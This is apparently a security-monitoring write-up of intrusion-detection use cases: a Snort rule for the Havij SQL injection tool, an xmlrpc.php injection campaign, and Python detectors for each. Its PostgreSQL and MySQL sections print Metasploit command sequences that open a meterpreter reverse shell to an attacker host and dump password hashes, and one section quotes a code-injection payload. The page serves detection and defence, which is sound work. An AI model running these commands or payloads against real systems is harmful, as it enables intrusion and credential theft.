SUC021 : Havij SQL Injection Tool User-Agent Inbound

  • Use Case Reference : SUC021
  • Use Case Title : Havij SQL Injection Tool User-Agent Inbound
  • Use Case Detection : IDS / HTTP / SQL logs
  • Attacker Class : Opportunists / Targeting Opportunists / Professional
  • Attack Sophistication : Unsophisticated / Low / Mid-High
  • Identified tool(s) : Havij Advanced SQL Injection
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 80/TCP, 443/TCP

Possible(s) correlation(s) :

  • Havij Advanced SQL Injection free version
  • Havij Advanced SQL Injection commercial version

Source(s) :

Snort rule :
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ZATAZ SCAN Havij SQL Injection Tool User-Agent Inbound"; flow:established,to_server; content:"|0D 0A|User-Agent|3a| Havij"; nocase; http_header; reference:url,itsecteam.com/en/projects/project1.htm; threshold:type limit, count 1, seconds 30, track by_src; classtype:web-application-attack; priority:2; sid:1010051; rev:1;)
[Figure: SIG 1010051 1 week events activity]
[Figure: SIG 1010051 1 month events activity]
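The matching and threshold logic of the Snort rule above (header-only match, case-insensitive, one alert per source IP per 30-second window), written in Python as an added example; this is not the ZATAZ rule itself nor Snort code, and the sample requests and IP addresses are constructed:

```python
import re
from collections import defaultdict

# Python rendering of the page's Snort rule (added example, not the ZATAZ rule itself):
# content:"|0D 0A|User-Agent|3a| Havij"; nocase; http_header;
# threshold:type limit, count 1, seconds 30, track by_src;
HAVIJ_UA = re.compile(rb"\r\nUser-Agent: Havij", re.IGNORECASE)

class HavijDetector:
    """Matches inbound HTTP request headers and applies the rule's
    threshold: at most one alert per source IP per 30-second window."""

    def __init__(self, limit_count=1, limit_seconds=30):
        self.limit_count = limit_count
        self.limit_seconds = limit_seconds
        # per-source: [window start time, alerts already raised in that window]
        self._windows = defaultdict(lambda: [None, 0])

    def matches(self, raw_request: bytes) -> bool:
        # http_header: inspect only the header block, never the body.
        header_block = raw_request.split(b"\r\n\r\n", 1)[0]
        return HAVIJ_UA.search(header_block) is not None

    def process(self, src_ip, ts, raw_request: bytes):
        """Return an alert dict (sid 1010051), or None when the threshold suppresses it."""
        if not self.matches(raw_request):
            return None
        win = self._windows[src_ip]
        if win[0] is None or ts - win[0] >= self.limit_seconds:
            win[0], win[1] = ts, 0           # open a fresh window
        if win[1] >= self.limit_count:
            return None                      # type limit: drop the rest of the window
        win[1] += 1
        return {"sid": 1010051, "src": src_ip, "ts": ts,
                "msg": "ZATAZ SCAN Havij SQL Injection Tool User-Agent Inbound"}

# Constructed sample requests (src_ip, seconds, raw request); not captured traffic.
SAMPLES = [
    ("203.0.113.5", 0, b"GET /index.php?id=1 HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Havij\r\n\r\n"),
    ("203.0.113.5", 10, b"GET /index.php?id=2 HTTP/1.1\r\nHost: www.example.com\r\nuser-agent: HAVIJ\r\n\r\n"),
    ("203.0.113.5", 45, b"GET /index.php?id=3 HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Havij\r\n\r\n"),
    ("198.51.100.7", 5, b"GET /index.php?id=1 HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"),
]

def run(samples=SAMPLES):
    det = HavijDetector()
    return [a for a in (det.process(ip, ts, req) for ip, ts, req in samples) if a]
```

Of the three Havij requests from the same source, only the first and the one 45 seconds later raise an alert; the second falls inside the 30-second window and is suppressed exactly as Snort's `type limit` does.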

PostgreSQL UDF for Microsoft Windows Metasploit Payload Execution

Timeline :

The vulnerability seems to have existed since 2007!
Vulnerability discovered and disclosed by Bernardo Damele on 2009-04-01
Metasploit PoC provided by todb on 2011-03-23

PoC provided by :

Bernardo Damele
todb

Reference(s) :

NONE

Affected version(s) :

All Microsoft Windows PostgreSQL versions up to and including 8.4.x (32-bit).

Tested on Windows XP SP3 with :

PostgreSQL 8.4.7

Description :

This module creates and enables a custom UDF (user-defined function) on the target host via the UPDATE pg_largeobject method of binary injection. On default Microsoft Windows installations of PostgreSQL, the postgres service account may write to the Windows temp directory, and may source UDF DLLs from there as well. PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on Microsoft Windows (32-bit) are valid targets for this module. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL and the OID.

Commands :

use exploit/windows/postgres/postgres_payload
set PASSWORD test
set RHOST 192.168.178.63
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid

Oracle MySQL UDF for Microsoft Windows Metasploit Payload Execution

Timeline :

The vulnerability seems to have existed since 2007!
Vulnerability discovered and disclosed by Bernardo Damele on 2009-01-16
Metasploit PoC provided by todb on 2011-03-08

PoC provided by :

Bernardo Damele
todb

Reference(s) :

NONE

Affected version(s) :

All Microsoft Windows MySQL versions that support UDFs, because the default MySQL installation runs with SYSTEM privileges.

Tested on Windows XP SP3 with :

MySQL Community 5.5.9

Description :

This module creates and enables a custom UDF (user-defined function) on the target host via the SELECT … INTO DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (=< 5.5.9), directory write permissions are not enforced and the MySQL service runs as LocalSystem. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine the sys_eval() and sys_exec() functions.

To exploit this weakness, the targeted MySQL user must have the following global privileges :

grant select,insert,file,create routine,alter routine,execute on *.* to 'test3'@'%' identified by 'test3';

Commands :

use exploit/windows/mysql/mysql_payload
set RHOST 192.168.178.41
set USERNAME test3
set PASSWORD test3

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
hashdump
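A statement-log check covering the two binary-injection methods described in the PostgreSQL and MySQL sections above (UPDATE pg_largeobject / lo_export, and SELECT … INTO DUMPFILE) together with the library-backed function definitions that follow them. This is an added example, not part of either Metasploit module; the log lines are constructed in the shape of PostgreSQL log_statement and MySQL general-log output.

```python
import re

# Constructed statement-log lines shaped like PostgreSQL log_statement and MySQL
# general-log output; not real captures.
SAMPLE_LOG = """\
2011-03-23 10:01:02 LOG:  statement: SELECT lo_create(12345)
2011-03-23 10:01:03 LOG:  statement: UPDATE pg_largeobject SET data = decode('4d5a', 'hex') WHERE loid = 12345 AND pageno = 0
2011-03-23 10:01:04 LOG:  statement: SELECT lo_export(12345, 'C:\\Windows\\Temp\\udf.dll')
2011-03-23 10:01:05 LOG:  statement: CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int AS 'C:\\Windows\\Temp\\udf.dll', 'sys_exec' LANGUAGE C STRICT
110308 11:22:01     5 Query     SELECT 0x4d5a INTO DUMPFILE 'C:\\Program Files\\MySQL\\MySQL Server 5.5\\lib\\plugin\\udf.dll'
110308 11:22:02     5 Query     CREATE FUNCTION sys_eval RETURNS string SONAME 'udf.dll'
110308 11:22:03     5 Query     SELECT name FROM mysql.func
110308 11:23:10     6 Query     SELECT id, title FROM posts WHERE id = 42
"""

# One rule per technique named in the two module descriptions on this page.
RULES = [
    ("pg_largeobject_write", re.compile(r"\bUPDATE\s+pg_largeobject\b", re.I)),
    ("pg_lo_export", re.compile(r"\blo_export\s*\(", re.I)),
    ("pg_c_language_function", re.compile(r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b.*\bLANGUAGE\s+C\b", re.I)),
    ("mysql_into_dumpfile", re.compile(r"\bINTO\s+DUMPFILE\b", re.I)),
    ("mysql_udf_soname", re.compile(r"\bCREATE\s+FUNCTION\b.*\bSONAME\b", re.I)),
]

def scan(log_text):
    """Return (line_number, rule_name, statement) for every statement a rule matches."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        for name, pat in RULES:
            if pat.search(line):
                hits.append((n, name, line.strip()))
                break
    return hits

def udf_sequence_present(hits):
    """True when the log shows both stages the modules rely on: a binary written
    to disk through SQL, then a function bound to that shared library."""
    names = {h[1] for h in hits}
    wrote = names & {"pg_largeobject_write", "pg_lo_export", "mysql_into_dumpfile"}
    bound = names & {"pg_c_language_function", "mysql_udf_soname"}
    return bool(wrote) and bool(bound)

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("UDF staging sequence present:", udf_sequence_present(hits))
```

A single CREATE FUNCTION with LANGUAGE C or SONAME can be legitimate administration; the combination with a preceding SQL-driven file write from the same session is what distinguishes this technique, so the second function is the one worth alerting on.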

SUC016 : RCE & SQL injection attempts on xmlrpc.php

  • Use Case Reference : SUC016
  • Use Case Title : RCE & SQL injection attempts on xmlrpc.php
  • Use Case Detection : IDS / Web logs
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Identified tool(s) : None identified, but the User-Agent is always Mozilla/5.0
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 80/TCP

Possible(s) correlation(s) :

  • Joomla XML-RPC vulnerability
  • Multi functions Web scanner (RFI, LFI, XMLRPC, etc.)

Source(s) :

For the past week we have detected increasing RCE (Remote Code Execution) and SQL injection attempts on xmlrpc.php. These attempts are detected by ET rule 2002158, whose last modification dates from 2009-03-13.

The payload carried by these attempts is shown below.

test.method',"));echo 'XxXDIOCANEXxX';exit;/*

Although the source IPs are completely random, the User-Agent is always Mozilla/5.0 and the payload is always the same. These attempts seem to be generated by a tool with Google dorking capabilities. The source IPs are also involved in other exploit attempts, as members of RFI or LFI botnets.
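A server-side allow-list check on the XML-RPC methodName, the field the quoted payload abuses: a legitimate method name never contains quotes, parentheses or semicolons, so rejecting anything outside the spec's character set stops this class of injection before the name reaches any interpreter. This is an added example, not code from the page or from any xmlrpc.php implementation; the request bodies are constructed, the second carrying the payload quoted above.

```python
import re
import xml.etree.ElementTree as ET

# Characters an XML-RPC method name may contain (letters, digits, underscore,
# dot, colon, slash). Quotes, parentheses and semicolons never belong there.
METHOD_NAME_OK = re.compile(r"^[A-Za-z0-9_.:/]+$")

def extract_method_name(body: str):
    """Return the <methodName> text of an XML-RPC call, or None if absent or unparseable."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    if root.tag != "methodCall":
        return None
    node = root.find("methodName")
    return node.text if node is not None else None

def classify(body: str) -> str:
    """'benign', 'suspicious' (method name fails the allow-list) or 'malformed'."""
    name = extract_method_name(body)
    if name is None:
        return "malformed"
    return "benign" if METHOD_NAME_OK.match(name) else "suspicious"

# Constructed request bodies; ATTACK carries the payload quoted on this page.
BENIGN = "<?xml version='1.0'?><methodCall><methodName>system.listMethods</methodName><params/></methodCall>"
ATTACK = ("<?xml version='1.0'?><methodCall><methodName>"
          "test.method',\"));echo 'XxXDIOCANEXxX';exit;/*"
          "</methodName><params/></methodCall>")

if __name__ == "__main__":
    for body in (BENIGN, ATTACK):
        print(classify(body), "->", extract_method_name(body))
```

Logging the rejected method name together with the source IP gives the same per-source view as the ET 2002158 signature, but from the application side, where TLS or encoding cannot hide the request from the check.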

[Figure: 24 hours SIG 2002158 events activity]
[Figure: 1 week SIG 2002158 events activity]
[Figure: 1 month SIG 2002158 events activity]
[Figure: One year SIG 2002158 events activity]
[Figure: 1 month TOP 10 source IPs for SIG 2002158]